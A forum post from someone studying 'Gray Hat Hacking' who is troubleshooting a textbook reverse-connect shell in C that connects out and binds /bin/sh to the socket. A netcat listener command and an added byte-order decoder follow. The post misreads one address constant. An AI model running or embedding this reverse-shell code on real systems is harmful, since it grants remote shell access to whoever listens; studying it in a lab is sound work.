Thread: Writing some shellcode, need a little help

  1. #1
    Junior Member g3ksan

    Hey guys,

    I'm working through Gray Hat Hacking and I'm trying to write the reverse connect shellcode example in the book.

    The code originally had serv_addr.sin_addr.s_addr=0x650A0A0A; in it, which is 10.10.10.101. I figured it might be part of the environment in the book, so I changed it to 0x100000F7;, which is 127.0.0.1.

    The book has me run a netcat session as "nc -nlvv -p 49059" and then run the program, which should just connect to the netcat session. nc just sits there, and the program just sits there. When I do a netstat to see what's going on, I get:

    Code:
    tcp        0      0 0.0.0.0:48059           0.0.0.0:*               LISTEN      15795/nc
    tcp        0      1 192.168.1.69:55624      247.0.0.16:48059        SYN_SENT    16187/reverse_conne

    Which is an external IANA reserved IP. When I change the code to reflect the book, it goes out to the proper IP that I hardcoded, which is 10.10.10.101, and when I hardcode my wlan0's IP, it goes out to 12.138.16.84, which is owned by ATT. When I turn off the internet, the code just exits.

    The book does not provide an environment to code in like Art of Exploitation does, so I'm trying it in BT4. I'm pretty much dumbfounded at this point, I'm not even sure how to troubleshoot this further. I understand if this is considered off topic.

    Thanks in advance!

    Source is below:

    Code:
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>	/* dup2(), execve() */
    
    int main()
    {
    	char * shell[2];
    	int soc,remote;
    	struct sockaddr_in serv_addr;
    
    	serv_addr.sin_family=2;			/* AF_INET */
    	serv_addr.sin_addr.s_addr=0x100000F7;	/* address constant from the post */
    	serv_addr.sin_port=0xBBBB;
    	soc=socket(2,1,0);			/* AF_INET, SOCK_STREAM */
    	remote = connect(soc, (struct sockaddr*)&serv_addr, 0x10);
    	/* point stdin, stdout and stderr at the socket */
    	dup2(soc,0);
    	dup2(soc,1);
    	dup2(soc,2);
    	shell[0]="/bin/sh";
    	shell[1]=0;
    	execve(shell[0],shell,0);
    }
    Last edited by g3ksan; 07-22-2010 at 02:58 AM. Reason: forgot to write that source was below, etc.
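
Added example, not part of the original post or the book: a small C decoder for reading hardcoded `sockaddr_in` constants the way a little-endian (x86) host stores them, applied to the values quoted above so the result can be compared with the netstat output. The function names are hypothetical, and the byte layout is modelled explicitly so the output does not depend on the machine running it.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Address the kernel uses when `lit` is assigned to sin_addr.s_addr on a
 * little-endian host (x86). The field is read as network byte order, so the
 * literal's lowest byte becomes the first octet. */
const char *s_addr_literal_to_ip(uint32_t lit)
{
    static char text[INET_ADDRSTRLEN];
    unsigned char wire[4] = {
        (unsigned char)(lit & 0xff),         (unsigned char)((lit >> 8) & 0xff),
        (unsigned char)((lit >> 16) & 0xff), (unsigned char)((lit >> 24) & 0xff)
    };
    return inet_ntop(AF_INET, wire, text, sizeof text);
}

/* Port the kernel uses when `lit` is assigned to sin_port on the same host. */
unsigned sin_port_literal_to_port(uint16_t lit)
{
    return ((lit & 0xffu) << 8) | (unsigned)(lit >> 8);
}

/* Inverse: the literal that stores dotted quad `ip` in s_addr on a
 * little-endian host, or -1 if `ip` does not parse. */
long long ip_to_s_addr_literal(const char *ip)
{
    unsigned char wire[4];
    if (inet_pton(AF_INET, ip, wire) != 1)
        return -1;
    return (long long)wire[0] | ((long long)wire[1] << 8) |
           ((long long)wire[2] << 16) | ((long long)wire[3] << 24);
}

int main(void)
{
    /* Constants quoted in the post above. */
    printf("0x650A0A0A -> %s\n", s_addr_literal_to_ip(0x650A0A0Au));
    printf("0x100000F7 -> %s\n", s_addr_literal_to_ip(0x100000F7u));
    printf("0xBBBB     -> port %u\n", sin_port_literal_to_port(0xBBBB));
    printf("127.0.0.1  -> 0x%08llX\n",
           (unsigned long long)ip_to_s_addr_literal("127.0.0.1"));
    return 0;
}
```

In portable code the same values come from `inet_pton()` and `htons()` rather than hand-written hex literals, which removes the dependence on host byte order.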
